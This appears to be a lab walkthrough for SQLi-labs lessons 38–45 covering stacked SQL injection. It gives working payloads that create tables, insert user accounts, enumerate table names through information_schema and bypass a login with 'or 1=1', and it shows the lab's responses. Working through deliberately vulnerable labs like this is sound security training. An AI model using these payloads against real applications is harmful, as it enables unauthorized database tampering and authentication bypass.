Lesson 38-53 are stacked SQL injections.

SQLi-labs: Lesson 38

Originally there're four tables: emails,referers,uagents,users

If you use the following query: ?id=1'; create table test like users;--+

Let's see what happened: ?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

Result:

Your Username is : emails,referers,test,uagents,users

So there's a new table 'test' was created.

You can also try update, insert, drop table, etc.

SQLi-labs: Lesson 39 & 41

Insert a new user:

?id=4;insert into users(id,username,password) values('33','user33','hello!')--+

Search the new user:?id=33

Your Username is : user33
Your Password is : hello!

SQLi-labs: Lesson 40

Insert a new user:

?id=0'); insert into users(id,username,password) values('44','user44','hello!')--+

Search the new user: ?id=44

Your Username is : user44
Your Password is : hello!

SQLi-labs: Lesson 42

In this lesson, password field in login page is vulnerable. So try this in password field: c';create table xx like users;--. Then let's browse to other page(e.g. lesson 40) to see whether the table xx is successfully created.

Your Username is : emails,referers,uagents,users,xx

Succeed!

SQLi-labs: Lesson 43 & 45

For lesson 43, add a single quote to password field, and get the following error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''c'')' at line 1

So this lesson has parenthesis around parameters.

Queries are similar to previous lessons.

Lesson 45 is blind based but has the same payload as lesson 43.

SQLi-labs: Lesson 44

Blind-based. Try this in password field: dd' or 1=1#. It works!

Now you can craft your query: dd';create table less44 like users;#

Check tables:

Your Username is : emails,less44,referers,uagents,users,xx

The table less44 is already in database.